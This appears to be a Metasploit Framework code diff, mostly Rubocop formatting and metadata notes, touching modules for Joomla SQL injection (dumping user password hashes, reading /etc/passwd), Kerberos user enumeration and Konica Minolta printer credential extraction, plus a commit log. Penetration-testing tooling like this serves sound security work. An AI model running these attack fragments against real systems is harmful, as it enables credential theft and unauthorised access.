          'Nixawk', # metasploit module
        ],
-      'License'        => MSF_LICENSE,
-      'DisclosureDate' => '2015-10-22'
-    ))
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2015-10-22',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/'])
-      ])
+      ]
+    )
  end

-  def print_good(message='')
+  def print_good(message = '')
    super("#{rhost}:#{rport} - #{message}")
  end

-  def print_status(message='')
+  def print_status(message = '')
    super("#{rhost}:#{rport} - #{message}")
  end

@@ -106,10 +113,9 @@ class MetasploitModule < Msf::Auxiliary

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'index.php'),
-      'vars_get'  => get,
+      'vars_get' => get,
    })

-
    if res && res.code == 200
      cookie = res.get_cookies
      post = {
@@ -120,7 +126,7 @@ class MetasploitModule < Msf::Auxiliary
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'method' => 'POST',
        'cookie' => cookie,
-        'vars_get'  => get,
+        'vars_get' => get,
        'vars_post' => post
      })

@@ -184,7 +190,7 @@ class MetasploitModule < Msf::Auxiliary
    colc = sqli(query)
    vprint_status("Found Columns: #{colc} from #{database}.#{table}")

-    valid_cols = [   # joomla_users
+    valid_cols = [ # joomla_users
      'activation',
      'block',
      'email',
@@ -214,6 +220,7 @@ class MetasploitModule < Msf::Auxiliary
        loop do
          value = sqli(query_fmt % [col, l, i])
          break if value.blank?
+
          record[col] << value
          l += 54
        end
@@ -244,12 +251,14 @@ class MetasploitModule < Msf::Auxiliary
      tables.each do |table|
        cols = query_columns(db, table)
        next if cols.blank?
+
        path = store_loot(
          'joomla.users',
          'text/plain',
          datastore['RHOST'],
          cols.to_json,
-          'joomla.users')
+          'joomla.users'
+        )
        print_good('Saved file to: ' + path)
      end
    end
@@ -8,31 +8,38 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Joomla com_contenthistory Error-Based SQL Injection',
-      'Description'    => %q{
-        This module exploits a SQL injection vulnerability in Joomla versions 3.2
-        through 3.4.4 in order to either enumerate usernames and password hashes.
-      },
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Joomla com_contenthistory Error-Based SQL Injection',
+        'Description' => %q{
+          This module exploits a SQL injection vulnerability in Joomla versions 3.2
+          through 3.4.4 in order to either enumerate usernames and password hashes.
+        },
+        'References' => [
          ['CVE', '2015-7297'],
          ['URL', 'https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/joomla-sql-injection-vulnerability-exploit-results-in-full-administrative-access/']
        ],
-      'Author'         =>
-        [
+        'Author' => [
          'Asaf Orpani', # discovery
          'bperry',      # metasploit module
          'Nixawk'       # module review
        ],
-      'License'        => MSF_LICENSE,
-      'DisclosureDate' => '2015-10-22'
-    ))
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2015-10-22',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/'])
-      ])
+      ]
+    )
  end

  def check
@@ -121,7 +128,7 @@ class MetasploitModule < Msf::Auxiliary
    colc = request(query, payload, lmark, rmark)
    vprint_status(colc)

-    valid_cols = [   # joomla_users
+    valid_cols = [ # joomla_users
      'activation',
      'block',
      'email',
@@ -151,6 +158,7 @@ class MetasploitModule < Msf::Auxiliary
        loop do
          value = request(query_fmt % [col, l, i], payload, lmark, rmark)
          break if value.blank?
+
          record[col] << value
          l += 54
        end
@@ -179,12 +187,14 @@ class MetasploitModule < Msf::Auxiliary
      tables.each do |table|
        cols = query_columns(db, table, payload, lmark, rmark)
        next if cols.blank?
+
        path = store_loot(
          'joomla.users',
          'text/plain',
          datastore['RHOST'],
          cols.to_json,
-          'joomla.users')
+          'joomla.users'
+        )
        print_good('Saved file to: ' + path)
      end
    end
@@ -7,38 +7,43 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read',
-      'Description'    => %q{
-      Joomla versions 3.2.2 and below are vulnerable to an unauthenticated SQL injection
-      which allows an attacker to access the database or read arbitrary files as the
-      'mysql' user. This module will only work if the mysql user Joomla is using
-      to access the database has the LOAD_FILE permission.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Brandon Perry <bperry.volatile[at]gmail.com>', #metasploit module
+    super(
+      update_info(
+        info,
+        'Name' => 'Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read',
+        'Description' => %q{
+          Joomla versions 3.2.2 and below are vulnerable to an unauthenticated SQL injection
+          which allows an attacker to access the database or read arbitrary files as the
+          'mysql' user. This module will only work if the mysql user Joomla is using
+          to access the database has the LOAD_FILE permission.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Brandon Perry <bperry.volatile[at]gmail.com>', # metasploit module
        ],
-      'References'     =>
-        [
+        'References' => [
          ['EDB', '31459'],
          ['URL', 'http://web.archive.org/web/20221129082328/https://developer.joomla.org/security/578-20140301-core-sql-injection.html']
        ],
-      'DisclosureDate' => '2014-03-02'
-    ))
+        'DisclosureDate' => '2014-03-02',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base Joomla directory path", '/']),
        OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"]),
        OptInt.new('CATEGORYID', [true, "The category ID to use in the SQL injection", 0])
-      ])
-
+      ]
+    )
  end

  def check
-
    front_marker = Rex::Text.rand_text_alpha(6)
    back_marker = Rex::Text.rand_text_alpha(6)

@@ -27,10 +27,14 @@ class MetasploitModule < Msf::Auxiliary
        'References' => [
          ['URL', 'https://nmap.org/nsedoc/scripts/krb5-enum-users.html']
        ],
-        'License' => MSF_LICENSE
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
      )
    )
-
  end

  def run
@@ -3,28 +3,33 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-
-
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Konica Minolta Password Extractor',
-      'Description' => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Konica Minolta Password Extractor',
+        'Description' => %q{
          This module will extract FTP and SMB account usernames and passwords
          from Konica Minolta multifunction printer (MFP) devices. Tested models include
          C224, C280, 283, C353, C360, 363, 420, C452, C452, C452, C454e, and C554.
        },
-      'Author'      =>
-        [
+        'Author' => [
          'Deral "Percentx" Heiland',
          'Pete "Bokojan" Arzamendi'
        ],
-      'License'     => MSF_LICENSE
-    ))
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
@@ -33,7 +38,8 @@ class MetasploitModule < Msf::Auxiliary
        OptString.new('PASSWD', [true, 'The default Admin password', '12345678']),
        OptInt.new('TIMEOUT', [true, 'Timeout for printer probe', 20])

-      ])
+      ]
+    )
  end

  # Creates the XML data to be sent that will extract AuthKey
@@ -45,13 +51,13 @@ class MetasploitModule < Msf::Auxiliary
               'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',
               'xmlns:SOAP-ENC' => 'http://schemas.xmlsoap.org/soap/encoding/',
               'xmlns:xsi' => 'http://www.w3.org/2001/XMLSchema-instance',
-               'xmlns:xsd' => 'http://www.w3.org/2001/XMLSchema'){
-        xml.send('SOAP-ENV:Header'){
-          xml.send('me:AppReqHeader', 'xmlns:me' => "http://www.konicaminolta.com/Header/OpenAPI-#{major}-#{minor}"){
+               'xmlns:xsd' => 'http://www.w3.org/2001/XMLSchema') {
+        xml.send('SOAP-ENV:Header') {
+          xml.send('me:AppReqHeader', 'xmlns:me' => "http://www.konicaminolta.com/Header/OpenAPI-#{major}-#{minor}") {
            xml.send('ApplicationID', 'xmlns' => '') { xml.text '0' }
            xml.send('UserName', 'xmlns' => '') { xml.text '' }
            xml.send('Password', 'xmlns' => '') { xml.text '' }
-            xml.send('Version', 'xmlns' => ''){
+            xml.send('Version', 'xmlns' => '') {
              xml.send('Major') { xml.text "#{major}" }
              xml.send('Minor') { xml.text "#{minor}" }
            }
@@ -59,8 +65,8 @@ class MetasploitModule < Msf::Auxiliary
          }
        }
        xml.send('SOAP-ENV:Body') {
-          xml.send('AppReqLogin', 'xmlns' => "http://www.konicaminolta.com/service/OpenAPI-#{major}-#{minor}"){
-            xml.send('OperatorInfo'){
+          xml.send('AppReqLogin', 'xmlns' => "http://www.konicaminolta.com/service/OpenAPI-#{major}-#{minor}") {
+            xml.send('OperatorInfo') {
              xml.send('UserType') { xml.text "#{user}" }
              xml.send('Password') { xml.text "#{passwd}" }
            }
@@ -78,30 +84,30 @@ class MetasploitModule < Msf::Auxiliary
               'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',
               'xmlns:SOAP-ENC' => 'http://schemas.xmlsoap.org/soap/encoding/',
               'xmlns:xsi' => 'http://www.w3.org/2001/XMLSchema-instance',
-               'xmlns:xsd' => 'http://www.w3.org/2001/XMLSchema'){
-        xml.send('SOAP-ENV:Header'){
-          xml.send('me:AppReqHeader', 'xmlns:me' => "http://www.konicaminolta.com/Header/OpenAPI-#{major}-#{minor}"){
+               'xmlns:xsd' => 'http://www.w3.org/2001/XMLSchema') {
+        xml.send('SOAP-ENV:Header') {
+          xml.send('me:AppReqHeader', 'xmlns:me' => "http://www.konicaminolta.com/Header/OpenAPI-#{major}-#{minor}") {
            xml.send('ApplicationID', 'xmlns' => '') { xml.text '0' }
            xml.send('UserName', 'xmlns' => '') { xml.text '' }
            xml.send('Password', 'xmlns' => '') { xml.text '' }
-            xml.send('Version', 'xmlns' => ''){
+            xml.send('Version', 'xmlns' => '') {
              xml.send('Major') { xml.text "#{major}" }
              xml.send('Minor') { xml.text "#{minor}" }
            }
            xml.send('AppManagementID', 'xmlns' => '') { xml.text '1000' }
          }
        }
-        xml.send('SOAP-ENV:Body'){
-          xml.send('AppReqGetAbbr', 'xmlns' => "http://www.konicaminolta.com/service/OpenAPI-#{major}-#{minor}"){
-            xml.send('OperatorInfo'){
+        xml.send('SOAP-ENV:Body') {
+          xml.send('AppReqGetAbbr', 'xmlns' => "http://www.konicaminolta.com/service/OpenAPI-#{major}-#{minor}") {
+            xml.send('OperatorInfo') {
              xml.send('AuthKey') { xml.text "#{authkey}" }
            }
-            xml.send('AbbrListCondition'){
+            xml.send('AbbrListCondition') {
              xml.send('SearchKey') { xml.text 'None' }
-              xml.send('WellUse') {  xml.text 'false' }
-              xml.send('ObtainCondition'){
+              xml.send('WellUse') { xml.text 'false' }
+              xml.send('ObtainCondition') {
                xml.send('Type') { xml.text 'OffsetList' }
-                xml.send('OffsetRange'){
+                xml.send('OffsetRange') {
                  xml.send('Start') { xml.text '1' }
                  xml.send('Length') { xml.text '100' }
                }
@@ -124,11 +130,12 @@ class MetasploitModule < Msf::Auxiliary
  # Validate XML Major Minor version
  def version
    response = send_request_cgi(
-    {
-      'uri'    => '/',
-      'method' => 'POST',
-      'data'   => '<SOAP-ENV:Envelope></SOAP-ENV:Envelope>'
-    }, datastore['TIMEOUT'].to_i)
+      {
+        'uri' => '/',
+        'method' => 'POST',
+        'data' => '<SOAP-ENV:Envelope></SOAP-ENV:Envelope>'
+      }, datastore['TIMEOUT'].to_i
+    )
    if response.nil?
      print_error("No response from device")
      return
@@ -140,9 +147,8 @@ class MetasploitModule < Msf::Auxiliary
      minor = ("#{minor_parse}")
      login(major, minor)
    end
-
-    rescue ::Rex::ConnectionError
-      print_error("Version check Connection failed")
+  rescue ::Rex::ConnectionError
+    print_error("Version check Connection failed")
  end

  # This section logs on and retrieves AuthKey token
@@ -151,11 +157,12 @@ class MetasploitModule < Msf::Auxiliary
    # Send post request with crafted XML to login and retrieve AuthKey
    begin
      response = send_request_cgi(
-      {
-        'uri'    => '/',
-        'method' => 'POST',
-        'data'   => authreq_xml.to_xml
-      }, datastore['TIMEOUT'].to_i)
+        {
+          'uri' => '/',
+          'method' => 'POST',
+          'data' => authreq_xml.to_xml
+        }, datastore['TIMEOUT'].to_i
+      )
      if response.nil?
        print_error("No response from device")
        return
@@ -178,11 +185,12 @@ class MetasploitModule < Msf::Auxiliary
      # Send post request with crafted XML as data
      begin
        response = send_request_cgi(
-        {
-          'uri'    => '/',
-          'method' => 'POST',
-          'data'   => smbreq_xml.to_xml
-        }, datastore['TIMEOUT'].to_i)
+          {
+            'uri' => '/',
+            'method' => 'POST',
+            'data' => smbreq_xml.to_xml
+          }, datastore['TIMEOUT'].to_i
+        )
        if response.nil?
          print_error("No response from device")
          return
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
cgranleese-r7	07ae49d6dc	Merge pull request #20360 from adfoster-r7/add-syslog-to-gemspec Add syslog to gemspec	2025-06-29 17:40:40 +01:00
adfoster-r7	bdc368f792	Add syslog to gemspec	2025-06-29 15:57:53 +01:00
jenkins-metasploit	583ffce9d7	automatic module_metadata_base.json update	2025-06-29 14:45:21 +00:00
cgranleese-r7	f57a3c278c	Merge pull request #20358 from adfoster-r7/fix-module-cache-generation Fix module cache generation	2025-06-29 13:44:28 +01:00
adfoster-r7	66bae427fb	Fix module cache generation	2025-06-29 01:05:42 +01:00
Spencer McIntyre	50a2749f97	Merge pull request #20289 from cgranleese-r7/adds-mitre-attack-references Adds support for MITRE ATT&CK References	2025-06-27 11:26:09 -04:00
msutovsky-r7	126bff18a1	Land #20346 , fixes payload encoding and substitutes for smaller base64 encoder Use the smaller base64 encoder	2025-06-27 17:15:05 +02:00
Diego Ledda	a7b038b822	Merge pull request #20341 from msutovsky-r7/exploit/skyvern_ssti_rce Adds module for Skyvern SSTI (CVE-2025-49619)	2025-06-27 14:14:40 +02:00
Martin Sutovsky	ee890a83ca	Adds BadChars	2025-06-27 11:03:08 +02:00
adfoster-r7	a0bb2d8c89	Merge pull request #20298 from bcoles/modules-SSL Modules: Convert SSL default option to Boolean in several modules	2025-06-26 15:00:59 +01:00
Martin Sutovsky	7b845fa3df	Fixed documentation issues	2025-06-26 12:08:51 +02:00
Martin Sutovsky	240bc828f1	Removing header	2025-06-26 12:08:51 +02:00
Metasploit	29b0efc5cf	Bump version of framework to 6.4.72	2025-06-26 03:33:38 -05:00
cgranleese-r7	a6cdb6deb9	Adds support for MITRE ATT&CK References	2025-06-25 17:24:47 +01:00
adfoster-r7	256ad33585	Merge pull request #20353 from cgranleese-r7/add-validation-for-arch-values Add validation for arch values	2025-06-25 17:13:01 +01:00
cgranleese-r7	00c88caffb	Updates incorrect arch values in modules	2025-06-25 16:57:27 +01:00
cgranleese-r7	a9a8ac7762	Adds validation for arch values	2025-06-25 16:57:23 +01:00
adfoster-r7	bbcac720e5	Merge pull request #20351 from cgranleese-r7/fix-non-printable-chars-in-module-description-and-name Fix non-printable non-ascii chars in module description and name	2025-06-25 15:39:59 +01:00
cgranleese-r7	04a18fb3ca	Updates modules to remove non-printable chars	2025-06-25 14:19:56 +01:00
cgranleese-r7	64504319e6	Updates module validation to check description and name for non-printable chars	2025-06-25 14:19:43 +01:00
msutovsky-r7	fdc78b40bb	Add more clear installation steps Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>	2025-06-25 15:17:58 +02:00
Diego Ledda	fda250d604	Merge pull request #19910 from msutovsky-r7/fix/add-PPC64-template Fixing PPC64 template and payloads	2025-06-25 12:33:39 +02:00
msutovsky-r7	fde78bf73f	Land #20324 , adds exploit for UNC path in .url files (CVE-2025-33053) Adds exploit module for Internet Shortcut UNC path vulnerability (CVE-2025-33053)	2025-06-25 11:23:23 +02:00
Diego Ledda	6d843385ec	Merge pull request #20301 from msutovsky-r7/exploit/cve-2021-25094 Adds module for Tatsu WP plugin (CVE-2021-25094)	2025-06-25 10:58:22 +02:00
adfoster-r7	f91f525e1e	Merge pull request #20350 from cgranleese-r7/adds-sentinel-values-to-modules-missing-one-or-more-notes Adds sentinel notes to modules that are missing stability, reliability or side effects	2025-06-25 09:50:09 +01:00
cgranleese-r7	40ca2b3b1b	Adds sentinel notes to modules that are missing stability, reliability or side effects	2025-06-25 09:32:01 +01:00
Diego Ledda	afdad8ed4c	chore(wp_tatsu_rce): msftidy_docs fix	2025-06-25 10:16:49 +02:00
adfoster-r7	82018b6c52	Merge pull request #20343 from cgranleese-r7/adds-sentinel-vales-to-modules-without-notes Adds sentinel values to modules without notes	2025-06-25 09:12:31 +01:00
Spencer McIntyre	6334996e60	Use the smaller base64 encoder	2025-06-24 15:58:17 -04:00
DevBuiHieu	e198cf635f	Merge pull request #2 from msutovsky-r7/collab/webdav_working_dir_exploit Minor code changes, updates documentation	2025-06-24 21:43:43 +07:00
Martin Sutovsky	13cd2d2e51	Minor code changes, updates documentation	2025-06-24 16:22:42 +02:00
msutovsky-r7	a67c883e0c	Removes unnecessary header Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>	2025-06-24 15:48:38 +02:00
Spencer McIntyre	12245519f5	Merge pull request #20206 from adfoster-r7/update-mettle Update mettle 1.0.42	2025-06-24 08:49:25 -04:00
DevBuiHieu	fa0d01f55c	Update modules/exploits/windows/fileformat/cve_2025_33053.rb Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>	2025-06-24 19:24:06 +07:00
DevBuiHieu	78f982e133	Merge pull request #1 from msutovsky-r7/collab/webdav_working_dir_exploit Internet Shortcut UNC Module Upgrade	2025-06-24 18:33:19 +07:00
cgranleese-r7	30c15535b4	Adds a check to skip modules with execellent ranking and sentinel values	2025-06-24 12:13:08 +01:00
cgranleese-r7	a454217bd4	Update info -d markdown	2025-06-24 11:21:49 +01:00
Martin Sutovsky	dd6bb2c8dc	Remove debug statements	2025-06-24 12:10:46 +02:00
Martin Sutovsky	3d9cc6063d	Adds SMB server to send payload	2025-06-24 12:10:19 +02:00
Martin Sutovsky	6aa24a0762	Adds researchers in author section, base for WebDAV server	2025-06-23 15:38:09 +02:00
cgranleese-r7	37388ca1be	Adds sentinel values to modules missing notes	2025-06-23 12:24:58 +01:00
adfoster-r7	0972888802	Update Mettle 1.0.42	2025-06-23 11:58:29 +01:00
adfoster-r7	4c4a864b06	Merge pull request #20326 from 00nx/patch-1 Add total number of currently defined aliases	2025-06-23 11:28:02 +01:00
adfoster-r7	be8864fe84	Merge pull request #20339 from bcoles/exploit-windows-fileformat-ms_visual_basic_vbp exploit/windows/fileformat/ms_visual_basic_vbp: Add offsets, cleanup, document	2025-06-23 10:41:14 +01:00
cgranleese-r7	b16732c3bf	Updates enforce notes rubocop rule to add notes to modules that are missing notes	2025-06-23 10:40:02 +01:00
bcoles	b483312eca	Modules: Convert SSL default option to Boolean in several modules	2025-06-23 19:38:36 +10:00
adfoster-r7	8c2d0f50bc	Merge pull request #20342 from cgranleese-r7/runs-trailing-comma-in-arguements-rubocop-on-modules Runs Style/TrailingCommaInArguments Rubocop against modules	2025-06-23 10:02:57 +01:00
cgranleese-r7	ade9b54d94	Runs Style/TrailingCommaInArguments Rubocop against modules	2025-06-23 09:30:35 +01:00
Martin Sutovsky	ca142599e8	Module init	2025-06-23 10:27:27 +02:00
msutovsky-r7	b37b6487e3	Land #20340 , adds documentation and cleans up exploit/windows/browser/ms08_070_visual_studio_msmask exploit/windows/browser/ms08_070_visual_studio_msmask: Cleanup and add documentation	2025-06-23 08:05:22 +02:00
adfoster-r7	51e71dc754	Merge pull request #20332 from todb/update-module-counter Update module counter	2025-06-22 23:13:32 +01:00
bcoles	e1dec29ef9	exploit/windows/browser/ms08_070_visual_studio_msmask: Cleanup and add documentation	2025-06-23 00:38:44 +10:00
bcoles	c0baf1888b	exploit/windows/fileformat/ms_visual_basic_vbp: Add offsets, cleanup, document	2025-06-23 00:11:54 +10:00
adfoster-r7	b8c375d087	Merge pull request #20337 from bcoles/exploit-linux-http-opentsdb_key_cmd_injection opentsdb_key_cmd_injection: Set Arch to ARCH_CMD	2025-06-22 14:51:04 +01:00
adfoster-r7	17125b492a	Merge pull request #20335 from bcoles/rubocop-Lint/DetectMetadataTrailingLeadingWhitespace Rubocop: Lint/DetectMetadataTrailingLeadingWhitespace: Except BadChars	2025-06-22 14:36:07 +01:00
bcoles	cede07596f	opentsdb_key_cmd_injection: Set Arch to ARCH_CMD	2025-06-22 12:39:04 +10:00
bcoles	8ab259122e	Land #20336 : opennms_horizon_authenticated_rce: Set Arch to ARCH_CMD	2025-06-22 12:31:22 +10:00
Ahmed Ezzat	0307bab692	Update opennms_horizon_authenticated_rce.rb Fix Arch	2025-06-21 20:37:33 +03:00
bcoles	e65532a7fc	Rubocop: Lint/DetectMetadataTrailingLeadingWhitespace: Except BadChars	2025-06-21 21:31:33 +10:00
Tod Beardsley	81cb85eef0	Make msfbase actually do something useful Signed-off-by: Tod Beardsley <todb@hugesuccess.org>	2025-06-20 13:05:11 -05:00
Tod Beardsley	21e093a41f	Slightly better module popularity counter Signed-off-by: Tod Beardsley <todb@hugesuccess.org>	2025-06-20 12:41:08 -05:00
adfoster-r7	04a6185f3a	Merge pull request #20329 from cgranleese-r7/runs-layout-rubocop-on-modules Runs Rubocop to fix layout in modules	2025-06-20 16:59:31 +01:00
cgranleese-r7	a4b14d8b64	Runs Rubocop to fix layout in modules	2025-06-20 15:18:01 +01:00
adfoster-r7	7208c10f37	Merge pull request #20330 from cgranleese-r7/fixes-conditional Fixes issues in a few modules	2025-06-20 15:09:49 +01:00
cgranleese-r7	42f31c0fce	Fixes some conditionals in modules	2025-06-20 14:57:03 +01:00
Martin Sutovsky	2122a34514	Removes overlooked file	2025-06-20 12:54:30 +02:00
adfoster-r7	b0dbe03544	Merge pull request #20315 from cgranleese-r7/adds-rubocop-rule-to-detect-module-metadata-whitespace Adds Rubocop rule to detect leading/trailing whitespace in module metadata	2025-06-20 00:22:42 +01:00
adfoster-r7	6d897eaeac	Merge pull request #20327 from cgranleese-r7/update-vulns-command Update `vulns` command	2025-06-20 00:21:51 +01:00
Martin Sutovsky	be394b7062	Adding PPC64 template, fixing PPC64 single payloads	2025-06-19 17:23:15 +02:00
Martin Sutovsky	00852f4682	Adding PPC64 template, fixing PPC64 single payloads	2025-06-19 17:17:19 +02:00
cgranleese-r7	65ed80f5b0	Add flag to vuln command to show vuln attempts	2025-06-19 16:06:25 +01:00
DevBuiHieu	dd51952b67	Update cve_2025_33053.rb	2025-06-19 21:32:34 +07:00
cgranleese-r7	9eef0cf13f	Adds Rubocop rule to detect leading/trailing whitespace in module metadata	2025-06-19 15:10:27 +01:00
DevBuiHieu	f3c4d9519f	Update modules/exploits/windows/fileformat/cve_2025_33053.rb Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>	2025-06-19 19:57:08 +07:00
DevBuiHieu	a0f1b0c5b3	Update modules/exploits/windows/fileformat/cve_2025_33053.rb Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>	2025-06-19 19:53:49 +07:00
DevBuiHieu	efc0c2539d	Update cve_2025_33053.rb	2025-06-19 19:53:22 +07:00
DevBuiHieu	600ffdb9b9	Update modules/exploits/windows/fileformat/cve_2025_33053.rb Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>	2025-06-19 19:44:35 +07:00
DevBuiHieu	4fde40a96b	Update modules/exploits/windows/fileformat/cve_2025_33053.rb Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>	2025-06-19 19:43:56 +07:00
Diego Ledda	c0dfbf43f2	Merge pull request #20235 from Chocapikk/vbulletin_replace_ad_template_rce vBulletin replaceAdTemplate Remote Code Execution	2025-06-19 14:20:16 +02:00
Metasploit	5ff0588554	Bump version of framework to 6.4.71	2025-06-19 03:33:21 -05:00
trauma	b1e1fbcc97	alias.rb	2025-06-18 21:43:11 +05:30
DevBuiHieu	1d27be2c1d	Final code for CVE-2025-33053 exploit module	2025-06-18 03:53:08 -04:00
DevBuiHieu	ec5ba0bd0d	Final code for CVE-2025-33053 exploit module	2025-06-17 23:03:36 -04:00
DevBuiHieu	20b8a9fcd3	Add some features and fix bugs for CVE-2025-33053 exploit module	2025-06-17 22:59:34 -04:00
DevBuiHieu	58609f3ff9	Add some features and fix bugs for CVE-2025-33053 exploit module	2025-06-17 22:32:57 -04:00
DevBuiHieu	cb7badbfad	Add some features and fix bugs for CVE-2025-33053 exploit module	2025-06-17 21:41:44 -04:00
DevBuiHieu	fda69e0a74	Add some features and fix all errors for CVE-2025-33053 exploit module	2025-06-17 11:15:09 -04:00
dwelch-r7	ab2c693f04	Merge pull request #20320 from rapid7/revert-20109-rails-7.2-upgrade Revert "Bump rails version to 7.2"	2025-06-17 12:25:03 +01:00
adfoster-r7	fb02b4ade5	Revert "Bump rails version to 7.2"	2025-06-17 12:20:49 +01:00
adfoster-r7	04c368f9de	Merge pull request #20109 from dwelch-r7/rails-7.2-upgrade Bump rails version to 7.2 [WIP]	2025-06-17 10:43:11 +01:00
DevBuiHieu	20629fe6b8	Add some features and fix all errors for CVE-2025-33053 exploit module	2025-06-17 02:49:10 -04:00
DevBuiHieu	9e5dd0962a	Add some features and delete old files for CVE-2025-33053 exploit module	2025-06-17 01:32:07 -04:00
DevBuiHieu	7ad7c62f03	Add some features and delete old files for CVE-2025-33053 exploit module	2025-06-17 01:20:09 -04:00
DevBuiHieu	540d18126d	Add some features and delete old files for CVE-2025-33053 exploit module	2025-06-17 01:11:16 -04:00
DevBuiHieu	f81ddf82f1	Add some features for CVE-2025-33053 exploit module	2025-06-17 01:00:35 -04:00
adfoster-r7	a02dff9bb5	Merge pull request #20302 from dwelch-r7/enable-defer-module-loads Enable defer module loads by default	2025-06-16 11:02:31 +01:00
jenkins-metasploit	580e2b3211	automatic module_metadata_base.json update	2025-06-15 21:50:54 +00:00
adfoster-r7	97b84b033f	Merge pull request #20309 from bcoles/rubocop-modules-exploits-linux-samba modules/exploits/linux/samba: Resolve RuboCop violations	2025-06-15 22:42:56 +01:00
adfoster-r7	ed2d6cdda6	Merge pull request #20312 from bcoles/rubocop-lib-msf-module-platform_list Msf::Module::PlatformList: Resolve RuboCop violations	2025-06-15 22:37:53 +01:00
bcoles	682a4b46e0	Msf::Module::PlatformList: Resolve RuboCop violations	2025-06-15 23:27:50 +10:00
adfoster-r7	b0ef381e02	Merge pull request #20313 from bcoles/rubocop-Style/FormatStringToken Rubocop: Disable Style/FormatStringToken	2025-06-15 13:00:11 +01:00
bcoles	52010861b6	Rubocop: Disable Style/FormatStringToken	2025-06-15 16:31:16 +10:00
bcoles	91d3675c3b	modules/exploits/linux/samba: Resolve RuboCop violations	2025-06-15 00:09:09 +10:00
DevBuiHieu	98389f2889	Add module documentation for CVE-2025-33053 URL generator	2025-06-13 20:35:38 -04:00
DevBuiHieu	1846aca52e	Add auxiliary module for CVE-2025-33053 .url file generator	2025-06-13 11:15:29 -04:00
DevBuiHieu	d3145f792e	Add auxiliary module for CVE-2025-33053 .url file generator	2025-06-13 11:14:04 -04:00
DevBuiHieu	9d52a2b11c	Add auxiliary module for CVE-2025-33053 .url file generator	2025-06-13 20:02:45 +07:00
Martin Sutovsky	4fe750a946	Removing redundant comment	2025-06-13 10:33:58 +02:00
Martin Sutovsky	3abe9b46c0	Addressing comments	2025-06-13 10:32:39 +02:00
Dean Welch	39356d55e0	Fix migration date issues when running tests	2025-06-12 16:41:10 +01:00
Dean Welch	4c2eeee4a7	Remove debug output	2025-06-12 16:41:10 +01:00
Dean Welch	62f357207c	Minor bug fixes	2025-06-12 16:41:10 +01:00
Dean Welch	640d992519	Add rpc debugging	2025-06-12 16:41:10 +01:00
Dean Welch	b87ef99cd8	Bump rails version to 7.2	2025-06-12 16:41:10 +01:00
jenkins-metasploit	b39d45c205	automatic module_metadata_base.json update	2025-06-12 14:03:39 +00:00
adfoster-r7	e4feb4f581	Merge pull request #20305 from cgranleese-r7/fix-duplicate-notes Fixes duplicate notes in a couple of modules	2025-06-12 14:55:19 +01:00
cgranleese-r7	1c72a3adc3	Fixes duplicate notes in a couple of modules	2025-06-12 14:32:12 +01:00
jenkins-metasploit	86a321f53d	automatic module_metadata_base.json update	2025-06-12 13:30:27 +00:00
msutovsky-r7	663cf4af24	Land #20303 , resolves Rubocop violations in modules/exploits/linux/postgres modules/exploits/linux/postgres: Resolve RuboCop violations	2025-06-12 15:20:05 +02:00
msutovsky-r7	b8dff5e701	Land #20304 , resolves Rubocop violations in modules/exploits/linux/pptp modules/exploits/linux/pptp: Resolve RuboCop violations	2025-06-12 15:13:29 +02:00
bcoles	bf68b56f88	modules/exploits/linux/pptp: Resolve RuboCop violations	2025-06-12 21:14:25 +10:00
bcoles	e0e5e4157a	modules/exploits/linux/postgres: Resolve RuboCop violations	2025-06-12 21:03:41 +10:00
